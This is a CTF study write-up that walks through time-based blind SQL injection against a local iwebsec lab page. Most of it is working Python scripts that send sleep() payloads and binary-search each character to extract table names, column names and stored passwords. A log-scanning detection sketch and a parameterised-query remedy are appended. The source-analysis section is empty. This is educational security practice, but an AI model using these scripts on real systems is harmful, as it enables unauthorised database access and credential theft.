CTF Study Notes 6: iwebsec SQL Injection Vulnerabilities, 03: sleep Injection
2022/1/23 2:04:16
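Contents
- I. Solution walkthrough
- (1) Examining the page
- (2) Writing scripts to extract the data step by step
- 1. Get the length of the database name (optional)
- 2. Get the database name (optional)
- 3. Get the table names
- 4. Get the column names of the users table
- 5. Get the data in the password column
- II. Source code analysis
- (1) PHP source
- Key script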
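I. Solution walkthrough
(1) Examining the page
The page output is identical whether or not the injected condition is true, so boolean-based blind injection cannot be used; the response time is used as the signal instead.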
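(2) Writing scripts to extract the data step by step
1. Get the length of the database name (optional)
```python
# encoding=utf-8
import requests
import time

# Lab target: the iwebsec range running on a local VM
url = "http://192.168.182.130:8001/sqli/04.php"

def DbLen():
    # Try each candidate length; the server sleeps 1 s only when the guess is right
    for i in range(1, 10):
        payload = "?id=if(length(database())={},sleep(1),1)--+".format(i)
        req_url = url + payload
        start_time = time.time()
        rep = requests.get(url=req_url)
        end_time = time.time()
        t = end_time - start_time
        # A response slower than 1 s means the condition was true
        if t > 1:
            print("DB length is " + str(i))

DbLen()
```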
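2. Get the database name (optional)
```python
# Continues the script above (uses url, requests and time)
def DbName():
    result = ""
    for i in range(1, 8):
        # Binary search over the printable ASCII range for character i
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            payload = "?id=if(ord(mid((select database()),{},1))>{},sleep(1),1) --+".format(i, mid)
            req_url = url + payload
            #print(req_url)
            start_time = time.time()
            rep = requests.get(url=req_url)
            end_time = time.time()
            t = end_time - start_time
            # Delayed response: the character code is greater than mid
            if t > 1:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("the result is {}".format(result))

DbName()
```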
3. Get the table names
```python
# Continues the script above (uses url, requests and time)
def TablesName():
    result = ""
    for i in range(1, 50):
        # Binary search over the printable ASCII range for character i
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            payload = '''?id=if(ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{},sleep(1),1) --+'''.format(i, mid)
            req_url = url + payload
            #print(req_url)
            start_time = time.time()
            rep = requests.get(url=req_url)
            end_time = time.time()
            t = end_time - start_time
            # Delayed response: the character code is greater than mid
            if t > 1:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("the result is {}".format(result))

TablesName()
```
4. Get the column names of the users table
```python
# Continues the script above (uses url, requests and time)
def ColumnsName():
    result = ""
    for i in range(1, 30):
        # Binary search over the printable ASCII range for character i
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            payload = '''?id=if(ord(mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{},1))>{},sleep(1),1) --+'''.format(i, mid)
            req_url = url + payload
            #print(req_url)
            start_time = time.time()
            rep = requests.get(url=req_url)
            end_time = time.time()
            t = end_time - start_time
            # Delayed response: the character code is greater than mid
            if t > 1:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("the result is {}".format(result))

ColumnsName()
```
5. Get the data in the password column
```python
# Continues the script above (uses url, requests and time)
def GetData():
    result = ""
    for i in range(1, 50):
        # Binary search over the printable ASCII range for character i
        l = 32
        r = 130
        mid = (l + r) >> 1
        while (l < r):
            payload = "?id=if(ord(mid((select group_concat(password) from iwebsec.users),{},1))>{},sleep(1),1) --+".format(i, mid)
            req_url = url + payload
            #print(req_url)
            start_time = time.time()
            rep = requests.get(url=req_url)
            end_time = time.time()
            t = end_time - start_time
            # Delayed response: the character code is greater than mid
            if t > 1:
                l = mid + 1
            else:
                r = mid
            mid = (l + r) >> 1
        result = result + chr(mid)
        print("the result is {}".format(result))

GetData()
```
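From the defender's side, the requests these scripts send leave a recognisable trace in web access logs. The detection sketch below is an added example, not part of the original notes; the log format, the client addresses and the `scan` function are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log (assumed format: client "request line" status seconds).
SAMPLE_LOG = """\
10.0.0.5 "GET /sqli/04.php?id=1 HTTP/1.1" 200 0.004
10.0.0.9 "GET /sqli/04.php?id=if(length(database())=7,sleep(1),1)--+ HTTP/1.1" 200 1.006
10.0.0.9 "GET /sqli/04.php?id=if(ord(mid((select%20database()),1,1))%3E81,sleep(1),1)%20--+ HTTP/1.1" 200 1.005
10.0.0.9 "GET /sqli/04.php?id=if(ord(mid((select%20database()),1,1))%3E105,sleep(1),1)%20--+ HTTP/1.1" 200 0.003
10.0.0.7 "GET /search.php?q=how+to+sleep+better HTTP/1.1" 200 0.010
"""

LINE_RE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) ([\d.]+)$')
# A delay function that is actually called, not just the word "sleep"
DELAY_RE = re.compile(r'\b(sleep|benchmark)\s*\(', re.I)
# Conditional / string-extraction calls of the kind the payloads on this page use
PROBE_RE = re.compile(r'\b(if|ord|ascii|mid|substr|substring|length)\s*\(', re.I)

def scan(log_text, slow=1.0):
    """Return {client: {"probes": n, "delayed": n}} for requests whose decoded
    parameters call a delay function inside a conditional/extraction expression."""
    hits = defaultdict(lambda: {"probes": 0, "delayed": 0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, _status, secs = m.groups()
        # parse_qsl URL-decodes each value, so %20 and %3E are matched in plain form
        for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if DELAY_RE.search(value) and PROBE_RE.search(value):
                hits[client]["probes"] += 1
                # A response at least as slow as the delay means the condition held
                if float(secs) >= slow:
                    hits[client]["delayed"] += 1
                break
    return dict(hits)

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Each flagged request answers one yes/no question about the database, so the `probes` count per client approximates how much was learned. The fix itself belongs in the application: bind `id` as a typed query parameter instead of concatenating it into the SQL string.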
II. Source code analysis
(1) PHP source
Key script